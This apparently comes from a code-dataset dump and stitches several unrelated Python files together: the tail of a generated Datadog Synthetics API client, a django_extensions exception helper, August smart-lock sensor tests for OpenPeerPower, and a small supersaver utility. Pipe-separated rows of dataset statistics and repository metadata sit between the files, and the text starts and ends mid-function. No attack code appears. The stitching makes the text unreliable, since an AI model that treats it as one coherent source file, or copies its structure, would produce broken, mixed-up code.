be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_browser_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_browser_test_endpoint.call_with_http_info(**kwargs)
def get_browser_test_latest_results(self, public_id, **kwargs):
"""Get a browser test's latest results summaries # noqa: E501
Get the last 50 test results summaries for a given Synthetics Browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_browser_test_latest_results(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the browser test for which to search results for.
Keyword Args:
from_ts (int): Timestamp from which to start querying results.. [optional]
to_ts (int): Timestamp up to which to query results.. [optional]
probe_dc ([str]): Locations for which to query results.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGetBrowserTestLatestResultsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_browser_test_latest_results_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_browser_test_latest_results_endpoint.call_with_http_info(**kwargs)
def get_browser_test_result(self, public_id, result_id, **kwargs):
"""Get a browser test result # noqa: E501
Get a specific full result from a given (browser) Synthetic test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_browser_test_result(public_id, result_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the browser test to which the target result belongs.
result_id (str): The ID of the result to get.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTestResultFull
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_browser_test_result_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["result_id"] = result_id
return self._get_browser_test_result_endpoint.call_with_http_info(**kwargs)
def get_global_variable(self, variable_id, **kwargs):
"""Get a global variable # noqa: E501
Get the detailed configuration of a global variable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_global_variable(variable_id, async_req=True)
>>> result = thread.get()
Args:
variable_id (str): The ID of the global variable.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsGlobalVariable
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_global_variable_endpoint.default_arguments(kwargs)
kwargs["variable_id"] = variable_id
return self._get_global_variable_endpoint.call_with_http_info(**kwargs)
def get_private_location(self, location_id, **kwargs):
"""Get a private location # noqa: E501
Get a Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_private_location(location_id, async_req=True)
>>> result = thread.get()
Args:
location_id (str): The ID of the private location.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsPrivateLocation
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_private_location_endpoint.default_arguments(kwargs)
kwargs["location_id"] = location_id
return self._get_private_location_endpoint.call_with_http_info(**kwargs)
def get_test(self, public_id, **kwargs):
"""Get a test configuration # noqa: E501
Get the detailed configuration associated with a Synthetics test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_test(public_id, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsTestDetails
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._get_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
return self._get_test_endpoint.call_with_http_info(**kwargs)
def list_global_variables(self, **kwargs):
"""Get all global variables # noqa: E501
Get the list of all Synthetics global variables. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_global_variables(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsListGlobalVariablesResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._list_global_variables_endpoint.default_arguments(kwargs)
return self._list_global_variables_endpoint.call_with_http_info(**kwargs)
def list_locations(self, **kwargs):
"""Get all locations (public and private) # noqa: E501
Get the list of public and private locations available for Synthetic tests. No arguments required. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_locations(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsLocations
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._list_locations_endpoint.default_arguments(kwargs)
return self._list_locations_endpoint.call_with_http_info(**kwargs)
def list_tests(self, **kwargs):
"""Get the list of all tests # noqa: E501
Get the list of all Synthetic tests. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tests(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsListTestsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._list_tests_endpoint.default_arguments(kwargs)
return self._list_tests_endpoint.call_with_http_info(**kwargs)
def trigger_ci_tests(self, body, **kwargs):
"""Trigger tests from CI/CD pipelines # noqa: E501
Trigger a set of Synthetics tests for continuous integration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.trigger_ci_tests(body, async_req=True)
>>> result = thread.get()
Args:
body (SyntheticsCITestBody): Details of the test to trigger.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsTriggerCITestsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._trigger_ci_tests_endpoint.default_arguments(kwargs)
kwargs["body"] = body
return self._trigger_ci_tests_endpoint.call_with_http_info(**kwargs)
def update_api_test(self, public_id, body, **kwargs):
"""Edit an API test # noqa: E501
Edit the configuration of a Synthetic API test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_api_test(public_id, body, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
body (SyntheticsAPITest): New test details to be saved.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsAPITest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_api_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["body"] = body
return self._update_api_test_endpoint.call_with_http_info(**kwargs)
def update_browser_test(self, public_id, body, **kwargs):
"""Edit a browser test # noqa: E501
Edit the configuration of a Synthetic browser test. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_browser_test(public_id, body, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the test to get details from.
body (SyntheticsBrowserTest): New test details to be saved.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsBrowserTest
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_browser_test_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["body"] = body
return self._update_browser_test_endpoint.call_with_http_info(**kwargs)
def update_private_location(self, location_id, body, **kwargs):
"""Edit a private location # noqa: E501
Edit a Synthetics private location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_private_location(location_id, body, async_req=True)
>>> result = thread.get()
Args:
location_id (str): The ID of the private location.
body (SyntheticsPrivateLocation): Details of the private location to be updated.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SyntheticsPrivateLocation
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_private_location_endpoint.default_arguments(kwargs)
kwargs["location_id"] = location_id
kwargs["body"] = body
return self._update_private_location_endpoint.call_with_http_info(**kwargs)
def update_test_pause_status(self, public_id, body, **kwargs):
"""Pause or start a test # noqa: E501
Pause or start a Synthetics test by changing the status. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_test_pause_status(public_id, body, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the Synthetic test to update.
body (SyntheticsUpdateTestPauseStatusPayload): Status to set the given Synthetic test to.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_test_pause_status_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["body"] = body
return self._update_test_pause_status_endpoint.call_with_http_info(**kwargs)
| 41.341452 | 120 | 0.536697 | 8,642 | 88,264 | 5.266489 | 0.031243 | 0.029662 | 0.028563 | 0.020873 | 0.914794 | 0.895986 | 0.881397 | 0.86439 | 0.83987 | 0.809615 | 0 | 0.004374 | 0.378297 | 88,264 | 2,134 | 121 | 41.360825 | 0.825036 | 0.441097 | 0 | 0.667565 | 0 | 0 | 0.219011 | 0.042833 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02336 | false | 0 | 0.020665 | 0 | 0.067385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f414184bcd7915c37994fec124f59c393ff76c40 | 138 | py | Python | env/lib/python3.4/site-packages/django_extensions/management/technical_response.py | dj-amadeous/deficit | cd086acd2165c96d3d0ed9c53fbc98da33afa83d | [
"MIT"
] | null | null | null | env/lib/python3.4/site-packages/django_extensions/management/technical_response.py | dj-amadeous/deficit | cd086acd2165c96d3d0ed9c53fbc98da33afa83d | [
"MIT"
] | null | null | null | env/lib/python3.4/site-packages/django_extensions/management/technical_response.py | dj-amadeous/deficit | cd086acd2165c96d3d0ed9c53fbc98da33afa83d | [
"MIT"
] | null | null | null | import six
def null_technical_500_response(request, exc_type, exc_value, tb, status_code=500):
six.reraise(exc_type, exc_value, tb)
| 23 | 83 | 0.782609 | 23 | 138 | 4.347826 | 0.652174 | 0.14 | 0.2 | 0.3 | 0.34 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049587 | 0.123188 | 138 | 5 | 84 | 27.6 | 0.77686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
be37f9c2e898f641d2e9ac161f365ab8221fcf9f | 10,003 | py | Python | tests/components/august/test_sensor.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 1 | 2021-07-08T20:09:55.000Z | 2021-07-08T20:09:55.000Z | tests/components/august/test_sensor.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 47 | 2021-02-21T23:43:07.000Z | 2022-03-31T06:07:10.000Z | tests/components/august/test_sensor.py | OpenPeerPower/core | f673dfac9f2d0c48fa30af37b0a99df9dd6640ee | [
"Apache-2.0"
] | null | null | null | """The sensor tests for the august platform."""
from openpeerpower.const import ATTR_UNIT_OF_MEASUREMENT, PERCENTAGE, STATE_UNKNOWN
from openpeerpower.helpers import entity_registry as er
from tests.components.august.mocks import (
_create_august_with_devices,
_mock_activities_from_fixture,
_mock_doorbell_from_fixture,
_mock_doorsense_enabled_august_lock_detail,
_mock_lock_from_fixture,
)
async def test_create_doorbell(opp):
"""Test creation of a doorbell."""
doorbell_one = await _mock_doorbell_from_fixture(opp, "get_doorbell.json")
await _create_august_with_devices(opp, [doorbell_one])
sensor_k98gidt45gul_name_battery = opp.states.get(
"sensor.k98gidt45gul_name_battery"
)
assert sensor_k98gidt45gul_name_battery.state == "96"
assert (
sensor_k98gidt45gul_name_battery.attributes["unit_of_measurement"] == PERCENTAGE
)
async def test_create_doorbell_offline(opp):
"""Test creation of a doorbell that is offline."""
doorbell_one = await _mock_doorbell_from_fixture(opp, "get_doorbell.offline.json")
await _create_august_with_devices(opp, [doorbell_one])
entity_registry = er.async_get(opp)
sensor_tmt100_name_battery = opp.states.get("sensor.tmt100_name_battery")
assert sensor_tmt100_name_battery.state == "81"
assert sensor_tmt100_name_battery.attributes["unit_of_measurement"] == PERCENTAGE
entry = entity_registry.async_get("sensor.tmt100_name_battery")
assert entry
assert entry.unique_id == "tmt100_device_battery"
async def test_create_doorbell_hardwired(opp):
"""Test creation of a doorbell that is hardwired without a battery."""
doorbell_one = await _mock_doorbell_from_fixture(opp, "get_doorbell.nobattery.json")
await _create_august_with_devices(opp, [doorbell_one])
sensor_tmt100_name_battery = opp.states.get("sensor.tmt100_name_battery")
assert sensor_tmt100_name_battery is None
async def test_create_lock_with_linked_keypad(opp):
"""Test creation of a lock with a linked keypad that both have a battery."""
lock_one = await _mock_lock_from_fixture(opp, "get_lock.doorsense_init.json")
await _create_august_with_devices(opp, [lock_one])
entity_registry = er.async_get(opp)
sensor_a6697750d607098bae8d6baa11ef8063_name_battery = opp.states.get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert sensor_a6697750d607098bae8d6baa11ef8063_name_battery.state == "88"
assert (
sensor_a6697750d607098bae8d6baa11ef8063_name_battery.attributes[
"unit_of_measurement"
]
== PERCENTAGE
)
entry = entity_registry.async_get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert entry
assert entry.unique_id == "A6697750D607098BAE8D6BAA11EF8063_device_battery"
state = opp.states.get("sensor.front_door_lock_keypad_battery")
assert state.state == "60"
assert state.attributes[ATTR_UNIT_OF_MEASUREMENT] == PERCENTAGE
entry = entity_registry.async_get("sensor.front_door_lock_keypad_battery")
assert entry
assert entry.unique_id == "5bc65c24e6ef2a263e1450a8_linked_keypad_battery"
async def test_create_lock_with_low_battery_linked_keypad(opp):
"""Test creation of a lock with a linked keypad that both have a battery."""
lock_one = await _mock_lock_from_fixture(opp, "get_lock.low_keypad_battery.json")
await _create_august_with_devices(opp, [lock_one])
entity_registry = er.async_get(opp)
sensor_a6697750d607098bae8d6baa11ef8063_name_battery = opp.states.get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert sensor_a6697750d607098bae8d6baa11ef8063_name_battery.state == "88"
assert (
sensor_a6697750d607098bae8d6baa11ef8063_name_battery.attributes[
"unit_of_measurement"
]
== PERCENTAGE
)
entry = entity_registry.async_get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert entry
assert entry.unique_id == "A6697750D607098BAE8D6BAA11EF8063_device_battery"
state = opp.states.get("sensor.front_door_lock_keypad_battery")
assert state.state == "10"
assert state.attributes[ATTR_UNIT_OF_MEASUREMENT] == PERCENTAGE
entry = entity_registry.async_get("sensor.front_door_lock_keypad_battery")
assert entry
assert entry.unique_id == "5bc65c24e6ef2a263e1450a8_linked_keypad_battery"
# No activity means it will be unavailable until someone unlocks/locks it
lock_operator_sensor = entity_registry.async_get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_operator"
)
assert (
lock_operator_sensor.unique_id
== "A6697750D607098BAE8D6BAA11EF8063_lock_operator"
)
assert (
opp.states.get("sensor.a6697750d607098bae8d6baa11ef8063_name_operator").state
== STATE_UNKNOWN
)
async def test_lock_operator_bluetooth(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(
opp, "get_activity.lock_from_bluetooth.json"
)
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Your favorite elven princess"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "mobile"
)
async def test_lock_operator_keypad(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(
opp, "get_activity.lock_from_keypad.json"
)
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Your favorite elven princess"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is True
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "keypad"
)
async def test_lock_operator_remote(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(opp, "get_activity.lock.json")
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Your favorite elven princess"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is True
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "remote"
)
async def test_lock_operator_autorelock(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(
opp, "get_activity.lock_from_autorelock.json"
)
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Auto Relock"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is True
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "autorelock"
)
| 33.680135 | 88 | 0.707988 | 1,143 | 10,003 | 5.798775 | 0.093613 | 0.051599 | 0.050694 | 0.076041 | 0.902836 | 0.857121 | 0.821666 | 0.808992 | 0.782136 | 0.775196 | 0 | 0.050639 | 0.210337 | 10,003 | 296 | 89 | 33.793919 | 0.788454 | 0.011397 | 0 | 0.582329 | 0 | 0 | 0.258423 | 0.222056 | 0 | 0 | 0 | 0 | 0.196787 | 1 | 0 | false | 0 | 0.012048 | 0 | 0.012048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be672f964354c5659e44cf1dea9227e2f680dbdd | 195 | py | Python | supersaver/util/__init__.py | ftkghost/SuperSaver | 04d1f19c309b35b540f056ad9a4796225f97cb76 | [
"BSD-2-Clause"
] | null | null | null | supersaver/util/__init__.py | ftkghost/SuperSaver | 04d1f19c309b35b540f056ad9a4796225f97cb76 | [
"BSD-2-Clause"
] | 1 | 2018-08-12T12:50:17.000Z | 2018-08-12T12:50:17.000Z | supersaver/util/__init__.py | ftkghost/supersaver | 04d1f19c309b35b540f056ad9a4796225f97cb76 | [
"BSD-2-Clause"
] | null | null | null | from core.model import Site
from sca.settings import SITE_NAME, SITE_DOMAIN
def get_site():
return Site(SITE_NAME, SITE_DOMAIN)
def get_in_app_url():
return "nz.co.scamedia://from-web" | 21.666667 | 47 | 0.753846 | 33 | 195 | 4.212121 | 0.575758 | 0.143885 | 0.172662 | 0.258993 | 0.345324 | 0.345324 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14359 | 195 | 9 | 48 | 21.666667 | 0.832335 | 0 | 0 | 0 | 0 | 0 | 0.127551 | 0.127551 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
be818590a71781156c1211ee3e9c001374b0255d | 58 | py | Python | apps/local_apps/account/context_processors.py | google-code-export/django-hotclub | d783a5bbcc06816289565f3eae6d99461188ca4a | [
"MIT"
] | 4 | 2016-04-10T13:37:58.000Z | 2018-06-11T18:49:29.000Z | apps/local_apps/account/context_processors.py | pombreda/django-hotclub | d783a5bbcc06816289565f3eae6d99461188ca4a | [
"MIT"
] | null | null | null | apps/local_apps/account/context_processors.py | pombreda/django-hotclub | d783a5bbcc06816289565f3eae6d99461188ca4a | [
"MIT"
] | 3 | 2017-07-09T02:14:54.000Z | 2021-07-13T19:16:59.000Z | def openid(request):
